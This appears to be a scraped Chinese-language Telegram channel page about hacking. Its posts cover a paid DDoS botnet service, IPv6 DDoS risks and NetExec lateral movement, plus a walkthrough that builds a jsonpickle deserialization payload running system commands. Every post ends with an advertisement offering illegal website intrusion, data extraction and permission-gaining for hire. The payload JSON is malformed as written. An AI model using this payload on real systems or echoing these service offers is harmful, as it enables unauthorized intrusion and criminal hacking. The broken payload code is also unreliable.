黑客网站渗透入侵破解拿权限
10.4K subscribers
2.39K photos
108 links
Download Telegram
RebirthLtd 通过自 2022 年 8 月起注册的 Web 店面上列出的各种套餐提供服务。
最便宜的套餐价格为 15 美元,买家可以购买订阅并立即获得僵尸网络服务的访问权限。
基本计划似乎仅包括对僵尸网络可执行文件的访问和受感染客户端可用数量有限的功能。
更昂贵的计划包括 API 访问、C2 服务器可用性和改进的功能,例如每秒可以发起的攻击次数。
该僵尸网络的主要服务似乎针对视频游戏主播以获取经济利益,因为其 Telegram 频道声称 RebirthHub(该僵尸网络的另一个绰号,与 RebirthLtd 一起)能够“攻击几乎所有类型的游戏服务器”。
接 /网站渗透 /黑客编程技术
/软件渗透 /提取数据
/网站权限 /网站入侵破解
有需求的找我
@MoA_Ke
在 IPv6 DDoS 之前,IPv6 快速入门
IPv4,即互联网协议版本 4,使用 32 位地址(例如 192.0.1.246)来路由当今的大部分互联网流量。

32 位地址空间将唯一主机的数量限制为 2 32,即近 43 亿个 IPv4 地址。但在当今超级互联的世界里,从智能手机到门铃摄像头,每台设备现在都有一个 IP 地址,事实证明 43 亿个地址远远不够。

IPv4 与 IPv6 的属性
2011 年,全球 IP 地址协调机构互联网号码分配机构 (IANA) 用尽了可供区域注册机构分配的免费 IPv4 地址。自那时起,区域注册机构几乎用尽了这些分配。

DNS放大攻击依靠可公开访问的 DNS 服务器来用 DNS 响应流量压垮受害者。

多年来,互联网社区一直在识别和修补开放的 IPv4 DNS 解析器,因为它们可用于放大攻击。但这项工作之所以能够成功,很大程度上是因为 IPv4 空间(约 43 亿个地址)是可扫描的。

然而,IPv6 的规模非常庞大,有 340 亿亿个可能的地址,因此几乎不可能扫描出错误配置和潜在漏洞。如果这些 DNS 解析器可以在 IPv6 网络上以同样的方式被利用,那么我们就有麻烦了。

IPv6 的其他潜在安全标志包括某些网络安全工具的不兼容性。IPv6 数据包头也比 IPv4 前身更长、更复杂,从而提供了更多的潜在攻击媒介。

就像他目睹的 Neustar 遭受的攻击一样,乔治向The Register表示,IPv4 和 IPv6 组合攻击可能特别有害。网络管理员可能会使用所有常见的攻击缓解工具,但只会切断 IPv4 流量。这将使网络仍然受到 IPv6 的攻击,而没有现成的响应工具。

双栈网络上的路由器和交换机也容易受到攻击,双栈网络允许网络同时处理 IPv4 和 IPv6 连接,一些大型企业已经实施了这种网络。
接 /网站渗透 /黑客编程技术
/软件渗透 /提取数据
/网站权限 /网站入侵破解
有需求的找我
@MoA_Ke
👍1👏1
NetExec 获取访问权限和横向移动
NetExec 可让您使用用户名、密码、哈希或 Kerberos 票证通过 SMB、WinRM 和 LDAP 访问目标系统。这使它成为执行传递哈希和传递票证攻击的绝佳黑客工具。

使用这些协议,您还可以使用 NetExec 一次对单台或多台机器执行自定义命令。这允许您在 Windows Active Directory 环境中执行横向移动时融入合法流量。

使用 NetExec 进行后期利用
获得目标机器的访问权限后,您必须启动渗透测试的后利用阶段。NetExec 是完成这项工作的完美工具。它可以帮助您建立持久性,收集有关网络、系统和已安装应用程序的信息,甚至上传和下载文件。

接 /网站渗透 /黑客编程技术
/软件渗透 /提取数据
/网站权限 /网站入侵破解
有需求的找我
@MoA_Ke
类型检查:
该方法首先检查 obj 是否是以下类型之一:str(字符串)、list(列表)、dict(字典)、set(集合)或 tuple(元组)。如果 obj 不是这些类型中的任何一个,那么将 restore 设置为 _passthrough,即默认的处理方式。
if not isinstance(obj, (str, list, dict, set, tuple)): restore = _passthrough

恢复过程:
如果 obj 是上述类型之一,那么调用 self._restore_tags(obj) 来对该对象进行“恢复”操作。 _restore_tags() 可能是一个方法,它会对对象进行特定的处理(具体的恢复方式要看该方法的实现)。
else: restore = self._restore_tags(obj)

最终调用:
无论是通过 _passthrough 还是 _restore_tags 处理后的结果,都会被传递给 restore() 函数进行最终的处理。
return restore(obj)

接着跟踪发现_restore_tags函数,通过识别标签来返回对应标签的功能

接 /网站渗透 /黑客编程技术
/软件渗透 /提取数据
/网站权限 /网站入侵破解
有需求的找我
@MoA_Ke
参数获取也有判断需要NEWARGSEX标签提供参数

if has_tag(obj, tags.NEWARGSEX):
args, kwargs = obj[tags.NEWARGSEX]

由于args, kwargs = obj[tags.NEWARGSEX],由于args为一个列表所以要列表包裹,又因为要返回俩个值args, kwargs,所以第二个参数要为空满足条件
而tuple源码中也是从列表中取值所以whoami也要用列表包裹

构造payload:"py/newargsex":["py/set":["whoami"],""]
整体payload如下

{"py/object":"nt.system","py/newargsex":["py/set":["whoami"],""]}
当然如果相加参数需要用字典包裹

{"py/object":"nt.system","py/newargsex":[{"py/set":["type"],"py/set":["2.py"]},""]}
经过调试后面便是system类的创建然后成功执行命令!下面就只需要绕过tuple标签

接 /网站渗透 /黑客编程技术
/软件渗透 /提取数据
/网站权限 /网站入侵破解
有需求的找我
@MoA_Ke
在 Python 中,所有类都可以定义 new 方法,以下是一些常见的内置类型和对象,它们通常会重载或使用 new 方法:

object: 所有类的基类,其 new 方法负责创建一个新实例。
type: 用于创建新的类,其 new 方法在元类中起作用。
int, float, complex: 数值类型的类,用于创建数值对象。
str, bytes, bytearray: 字符串和字节序列类型的类,用于创建字符串或字节序列对象。
list, tuple, set, frozenset, dict: 容器类型的类,用于创建相应的容器对象。
比如我们可以用map类可以满足条件,又由于loadclass函数里面通过import一个moudle来找到一个方法,我们可以这样来引入命令执行函数builtins.eval以及一些内置类

接 /网站渗透 /黑客编程技术
/软件渗透 /提取数据
/网站权限 /网站入侵破解
有需求的找我
@MoA_Ke